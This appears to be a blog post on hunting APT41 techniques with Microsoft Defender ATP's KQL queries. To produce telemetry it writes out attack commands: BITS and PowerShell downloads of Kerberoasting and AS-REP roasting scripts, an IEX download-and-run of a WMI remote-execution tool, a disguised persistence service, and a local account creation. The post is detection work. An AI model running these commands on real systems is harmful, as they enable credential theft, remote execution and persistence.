Hunting for techniques used by APT41

Introduction

Today we are going to cover a few techniques that have been used by APT41. During this blog post, we will use the Advanced Hunting feature in Microsoft Defender ATP to hunt for the described techniques.

APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.

This threat actor group has been active since 2014, conducted operations backed by the Chinese government, including targeting the health-care and high-tech sectors and conducting espionage against political dissidents.

APT Hunter

T1197 – BITS Jobs

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

FireEye has covered this pretty well in their blog post, which makes it very easy to simulate it.

Here we can see that APT41 has used the bitsadmin.exe command-line tool to download malicious software.

Source: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

In order to simulate the same technique, we can run the following command as an example:

bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1

After we have simulated this technique, we can start writing a KQL query to hunt for this technique.

KQL query: https://github.com/DebugPrivilege/KQL/blob/master/Microsoft%20Threat%20Protection/BITSAdmin.yaml

The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.

Since it’s also optional to create BITS jobs via PowerShell. It’s recommended to be aware of this variation as well, so here is an example of creating a BITS job via PowerShell.

powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1

After we have executed the above, we can start writing our second KQL query to hunt.

KQL query: https://github.com/DebugPrivilege/KQL/blob/master/Microsoft%20Threat%20Protection/PowerShellBITS.yaml

T1047 – Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components.

According to FireEye – They have notice that APT41 likes to use WMI to execute commands on remote machines.

Source: https://prateeksahu.github.io/ent_sec/file/rpt-apt41.pdf
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1')

.\WmiExec.ps1 -ComputerName RemoteMachine -Command "whoami"

After we have executed the above commands. We can start writing a KQL query to hunt for remote WMI command executions.

KQL query: https://github.com/DebugPrivilege/KQL/blob/master/Microsoft%20Threat%20Protection/WMIExec.yaml

T1543.003 – Create or Modify System Process: Windows Service

Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.

In order to extend the advanced hunting capabilities. We can enable the following audit policy to collect logs, when a new service has been installed.

auditpol /set /subcategory:"Security System Extension" /success:enable

Now let’s take a look at the report of FireEye. APT41 created a new service on the compromised machine for persistence.

Source: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

Let’s do the same, which is creating a new service.

sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k "StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"

In order to query who created a new service on their machine. We can use the following KQL query:

KQL query: https://github.com/DebugPrivilege/KQL/blob/master/Microsoft%20Threat%20Protection/NewService.yaml

T1136 – Create Account

Adversaries may create an account to maintain access to victim systems.

Source: https://attack.mitre.org/groups/G0096/
net user localaccount Passw0rd! /add

Here is a KQL query to look for local account creations.

KQL query: https://github.com/DebugPrivilege/KQL/blob/master/Microsoft%20Threat%20Protection/CreateAccount.yaml

Disclaimer:

I’ve provided a few KQL queries, but feel free to fine-tune them. I also would like to state that these were just a few examples, that have been used by the threat actors, which doesn’t mean that we have covered all their techniques.

Reference:

https://attack.mitre.org/groups/G0096/

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

https://www.cfr.org/cyber-operations/apt-41

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: